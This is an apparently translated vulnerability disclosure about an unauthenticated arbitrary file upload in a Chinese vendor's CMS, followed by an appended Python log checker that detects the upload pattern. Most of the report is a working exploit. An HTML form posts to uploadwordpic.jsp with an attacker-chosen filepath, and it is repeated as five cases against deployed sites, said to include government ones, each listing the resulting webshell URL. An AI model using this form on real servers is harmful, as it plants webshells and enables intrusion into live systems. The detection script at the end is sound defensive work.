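2015-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-11-24: The vendor has actively ignored the vulnerability; details disclosed to the public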
RT
北京东方文辉信息技术有限公司 (Beijing Dongfang Wenhui Information Technology Co., Ltd.)
Official website: http://**.**.**.**
Version: all versions affected; no login or other authentication required
Many government deployments
File upload via uploadwordpic.jsp:
exp:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**/app/jspx.jspx
The /app path can be customized.
Case 1:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**/app/jspx.jspx
Case 2:
<FORM name=form1 method=post action="http://**.**.**.**:8088/nlw/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**:8088/nlw/app/jspx.jspx
Case 3:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**/app/jspx.jspx
Case 4:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**/app/jspx.jspx
Case 5:
<FORM name=form1 method=post action="http://**.**.**.**/fsm/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**/fsm/app/jspx.jspx
As above.
Unable to contact the vendor, or the vendor actively refused.
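
A log check for the request pattern in the cases above, added here as an example and not part of the original report: it flags POSTs to uploadwordpic.jsp that carry a filepath parameter, then any later request for a .jsp/.jspx file under the directory that parameter named. The combined access-log format, the name find_upload_abuse and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2015:10:00:01 +0800] "POST /nlw/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=1&AddWebColumnID=2&filepath=/app/ HTTP/1.1" 200 15
198.51.100.7 - - [10/Oct/2015:10:00:05 +0800] "GET /nlw/app/jspx.jspx HTTP/1.1" 200 120
203.0.113.9 - - [10/Oct/2015:10:01:00 +0800] "GET /nlw/index.jsp HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2015:10:02:00 +0800] "GET /nlw/app/logo.png HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
UPLOAD_SUFFIX = "/cms/fileupload/uploadwordpic.jsp"  # endpoint named on the page
SCRIPT_EXT = (".jsp", ".jspx")                       # server-executed extensions


def find_upload_abuse(log_text):
    """Return (kind, client, path) findings in log order."""
    findings = []
    upload_dirs = set()  # directories named by filepath= in earlier uploads
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, method, target = m.groups()
        url = urlsplit(target)
        path = url.path
        if method == "POST" and path.endswith(UPLOAD_SUFFIX):
            # Context path (e.g. "/nlw") precedes the endpoint and, per the
            # page's cases, also precedes the directory the file lands in.
            prefix = path[: -len(UPLOAD_SUFFIX)]
            for fp in parse_qs(url.query).get("filepath", []):
                directory = (prefix + "/" + fp.strip("/")).rstrip("/") + "/"
                upload_dirs.add(directory)
                findings.append(("upload_with_filepath", client, directory))
        elif path.lower().endswith(SCRIPT_EXT):
            if any(path.startswith(d) for d in upload_dirs):
                findings.append(("script_in_upload_dir", client, path))
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Any script_in_upload_dir finding means a server-executed file is being served from a directory that an upload request chose, which is worth checking on disk regardless of who requested it.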